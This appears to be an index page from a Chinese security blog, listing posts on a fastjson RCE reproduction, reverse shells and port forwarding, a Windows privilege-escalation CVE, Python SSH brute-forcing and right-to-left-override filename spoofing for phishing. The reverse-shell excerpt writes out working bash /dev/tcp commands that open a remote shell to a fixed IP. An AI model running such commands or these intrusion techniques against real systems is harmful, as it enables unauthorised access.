fastjson<1.2.47 RCE 漏洞复现
这两天爆出了 fastjson 的老洞,复现简单记录一下。 首先使用 spark 搭建一个简易的利用 fastjson 解析 json 的 http server。 ...
Hacker
反弹shell以及端口转发的方法收集
Bash 1 bash -i >& /dev/tcp/192.168.1.142/80 0>&1 1 2 3 4 exec 5<>/dev/tcp/192.168.1.142/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done ...
CVE-2018-8120 Windows权限提升
来源 : bigric3/cve-2018-8120 Detail : cve-2018-8120-analysis-and-exploit ...
Python SSH爆破以及Python3线程池控制线程数
源自一个朋友的要求,他的要求是只爆破一个ip,结果出来后就停止,如果是爆破多个,完全没必要停止,等他跑完就好 ...
从右向左覆盖实现恶意软件扩展名欺骗
这个技术虽然老掉牙,但在网络钓鱼中非常好用 ...